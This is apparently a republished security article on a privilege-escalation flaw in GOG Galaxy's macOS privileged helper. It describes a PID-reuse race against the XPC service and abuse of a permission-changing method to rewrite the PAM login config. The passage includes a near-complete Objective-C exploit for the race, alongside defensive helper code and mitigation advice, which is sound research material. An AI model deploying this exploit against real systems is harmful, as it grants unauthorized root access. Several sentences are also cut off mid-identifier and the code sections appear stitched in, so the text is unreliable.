As a member of the Adversary Services team at IBM, I need to keep my skills up to date and constantly learn new things.
macOS security is one field where I decided to put more effort this year, to further improve my exploitation and operational skills in macOS environments.
When GOG Galaxy is installed, it creates a new file in the /Library/LaunchDaemons directory with the name of com.
Such LaunchDaemons are usually privileged helper tools: they run as root and perform privileged actions on behalf of a low-privileged application.
Inspecting the PLIST file created by GOG Galaxy, it shows that an XPC service named com.
ClientService is exposed by the Privileged Helper tool located in /Library/PrivilegedHelperTools/com.
On macOS, PIDs can be reused, and a process can even replace its own executable image with a different one via posix_spawn() while keeping its PID (the POSIX_SPAWN_SETEXEC attribute makes posix_spawn() behave like exec instead of creating a new process). This was originally published at WarCon 2018 in the presentation Don't Trust the PID. The attack is a race condition: the exploit sends a burst of messages to the XPC service and, immediately afterwards, calls posix_spawn() in exec mode on a binary that satisfies all of the service's security requirements, so that the PID of the malicious process now belongs to a legitimate image. With many messages queued, the gap between the service receiving a message and validating the sending process is long enough that, by the time the service looks up the sender's PID, that PID belongs to the real application and the validation passes.
Although impersonating a trusted client lets us invoke any method the privileged helper exposes, that is only useful if one of those methods offers an opportunity for exploitation.
The protocol used between the XPC service and its client is called ClientServiceProtocol.
It exposes a method that changes the permissions of an arbitrary path, so as a low-privileged user we can communicate with the XPC service and change the permissions of any file on the system.
The /etc/pam.d/login file is the Pluggable Authentication Modules (PAM) configuration for the login service on macOS; the /etc/pam.d directory holds one such file per service. Modifying its auth entries to use the pam_permit module, which unconditionally succeeds.
Connect to the XPC service from forked child processes, and replace each child's image with the legitimate binary so that the child's PID passes the service's validation.
Call the changeFolderPermissionsAtPath method exposed by the XPC service to modify the permissions of /etc/pam.
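The following is an added example, not the article's or GOG's own exploit code, of the two steps above: each child process queues a burst of requests at the helper, then swaps its own image for a binary that satisfies the helper's check while keeping its PID. The mach service name, the path of the trusted binary and the exact signature of changeFolderPermissionsAtPath are not given on this page, so they are placeholders here (the protocol method is assumed to take a path and a reply block). Children are started as spawned copies of the program rather than with fork(), because Foundation is not safe to use in a forked child that has not exec'd; the effect on the race is the same.

```objc
// Added example (not from the original article or from GOG Galaxy): the
// PID-reuse race against a privileged helper that validates clients by PID.
// Build on macOS: clang -fobjc-arc -framework Foundation -o race race.m
#import <Foundation/Foundation.h>
#include <spawn.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

// Placeholders: the page does not give these values.
static NSString *const kMachService   = @"<mach service name from the helper's LaunchDaemon plist>";
static const char *const kTrustedBinary = "/path/to/binary/that/satisfies/the/helpers/check";
static NSString *const kTargetFolder  = @"/etc/pam.d";
static const int kChildren = 8;
static const int kMessagesPerChild = 500;

// Assumed shape of the exposed protocol; only the method name is on the page.
@protocol ClientServiceProtocol
- (void)changeFolderPermissionsAtPath:(NSString *)path withReply:(void (^)(BOOL ok))reply;
@end

static void runChild(void) {
    NSXPCConnection *conn = [[NSXPCConnection alloc] initWithMachServiceName:kMachService
                                                                     options:NSXPCConnectionPrivileged];
    conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ClientServiceProtocol)];
    [conn resume];
    id<ClientServiceProtocol> svc = [conn remoteObjectProxyWithErrorHandler:^(NSError *err) {}];

    // Queue many requests. They sit in the helper's Mach port queue and are
    // only validated when the helper gets to each one, i.e. after the exec below.
    for (int i = 0; i < kMessagesPerChild; i++) {
        [svc changeFolderPermissionsAtPath:kTargetFolder withReply:^(BOOL ok) {}];
    }

    // POSIX_SPAWN_SETEXEC (macOS-specific) makes posix_spawn replace the calling
    // process image like execve, so the PID the helper looks up now belongs to
    // the trusted binary.
    posix_spawnattr_t attr;
    posix_spawnattr_init(&attr);
    posix_spawnattr_setflags(&attr, POSIX_SPAWN_SETEXEC);
    char *argv[] = { (char *)kTrustedBinary, NULL };
    pid_t pid;
    int rc = posix_spawn(&pid, kTrustedBinary, NULL, &attr, argv, environ);
    // Only reached if the exec failed.
    fprintf(stderr, "posix_spawn(SETEXEC) failed: %s\n", strerror(rc));
    _exit(1);
}

int main(int argc, char *argv[]) {
    @autoreleasepool {
        if (argc > 1 && strcmp(argv[1], "child") == 0) {
            runChild();
        }
        // Several children run concurrently to widen the race window. They are
        // spawned copies of this program because Foundation must not be used in a
        // fork()ed child that has not exec'd.
        char *childArgv[] = { argv[0], "child", NULL };
        for (int i = 0; i < kChildren; i++) {
            pid_t pid;
            posix_spawn(&pid, argv[0], NULL, NULL, childArgv, environ);
        }
        int status;
        while (wait(&status) > 0) {}
    }
    return 0;
}
```

The race only pays off against a helper that resolves the sender by PID at message-handling time; a helper that binds its decision to the connection's audit token is not affected by the image swap.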
Adversaries abuse XPC services to execute malicious code, bypass application whitelisting, and escalate privileges.
On macOS, applications use XPC to send messages to services such as privileged helper tools, which run as root.
These attacks often take advantage of improper XPC client validation and poor input validation to allow code to be executed with elevated privileges.
Securing XPC can be challenging, as it requires secure coding practices from the application vendor: validating the connecting client by its code signature rather than by its PID, validating the inputs of every exposed method, enabling the hardened runtime for XPC services, and notarizing the application.
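As an added example, not code from GOG Galaxy or from the original article, here is how a privileged helper's NSXPCListener delegate can validate clients. The PID-based check is the pattern the race above defeats; the hardened path hands the code-signing requirement to libxpc, which applies it to the peer behind the connection rather than to whatever currently owns the PID. The exported method also shows the input-validation side. Service name, bundle identifier, team ID, the allow-listed directory and the protocol signature are placeholders.

```objc
// Added example (not GOG's code): client validation in a privileged helper.
// Build on macOS: clang -fobjc-arc -framework Foundation -framework Security -o helper helper.m
#import <Foundation/Foundation.h>
#import <Security/Security.h>
#include <sys/stat.h>

static NSString *const kMachService = @"com.example.helper";          // placeholder
static NSString *const kClientRequirement =                           // placeholder identifier/team
    @"anchor apple generic and identifier \"com.example.client\" "
     "and certificate leaf[subject.OU] = \"TEAMID0000\"";

// Assumed shape of the exposed protocol; only the method name is on the page.
@protocol ClientServiceProtocol
- (void)changeFolderPermissionsAtPath:(NSString *)path withReply:(void (^)(BOOL ok))reply;
@end

@interface ClientService : NSObject <ClientServiceProtocol>
@end
@implementation ClientService
- (void)changeFolderPermissionsAtPath:(NSString *)path withReply:(void (^)(BOOL))reply {
    // Input validation: a helper that chmods any path hands root to whoever can
    // talk to it. Resolve symlinks first, then restrict to the directory the app owns.
    NSString *resolved = [path stringByResolvingSymlinksInPath];
    BOOL allowed = [resolved hasPrefix:@"/Applications/Example.app/"];   // placeholder allow-list
    reply(allowed && chmod(resolved.fileSystemRepresentation, 0755) == 0);
}
@end

@interface HelperListener : NSObject <NSXPCListenerDelegate>
@end
@implementation HelperListener

// VULNERABLE PATTERN: identify the peer by PID and check the signature of
// whatever currently has that PID. posix_spawn() with POSIX_SPAWN_SETEXEC keeps
// the PID while replacing the image, so this can pass for a process that is not
// the one whose messages are still queued.
- (BOOL)pidBasedCheck:(NSXPCConnection *)connection {
    BOOL trusted = NO;
    SecCodeRef code = NULL;
    SecRequirementRef req = NULL;
    NSDictionary *attrs = @{ (__bridge id)kSecGuestAttributePid : @(connection.processIdentifier) };
    if (SecCodeCopyGuestWithAttributes(NULL, (__bridge CFDictionaryRef)attrs, kSecCSDefaultFlags, &code) == errSecSuccess
        && SecRequirementCreateWithString((__bridge CFStringRef)kClientRequirement, kSecCSDefaultFlags, &req) == errSecSuccess) {
        trusted = (SecCodeCheckValidity(code, kSecCSDefaultFlags, req) == errSecSuccess);
    }
    if (code) CFRelease(code);
    if (req) CFRelease(req);
    return trusted;
}

- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)conn {
    if (@available(macOS 13.0, *)) {
        // HARDENED PATTERN: libxpc enforces the requirement against the peer's
        // audit token, so the check is bound to the process that actually sent
        // each message, not to whoever owns the PID at check time. Must be set
        // before -resume. (The C API equivalent, macOS 12+, is
        // xpc_connection_set_peer_code_signing_requirement().)
        [conn setCodeSigningRequirement:kClientRequirement];
    } else if (![self pidBasedCheck:conn]) {
        return NO;   // pre-13 fallback; still exposed to the PID-reuse race
    }
    conn.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ClientServiceProtocol)];
    conn.exportedObject = [ClientService new];
    [conn resume];
    return YES;
}
@end

int main(void) {
    @autoreleasepool {
        HelperListener *delegate = [HelperListener new];
        NSXPCListener *listener = [[NSXPCListener alloc] initWithMachServiceName:kMachService];
        listener.delegate = delegate;
        [listener resume];
        [[NSRunLoop currentRunLoop] run];
    }
    return 0;
}
```

The requirement string pins the client to a specific bundle identifier and signing team; "anchor apple generic" alone would accept any Developer ID-signed binary, which is exactly the class of image the race swaps in.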
Organizations can and should inventory the privileged helper tools and LaunchDaemons installed in their environment (for example the contents of /Library/PrivilegedHelperTools and /Library/LaunchDaemons), check how each one is signed, and understand the risks associated with its operation.
Monitoring for low-privileged processes that make unusual calls to privileged helpers could be an early indication of this type of attack.
This Cyber News was published on securityintelligence.com. Publication date: Thu, 07 Dec 2023 20:43:06 +0000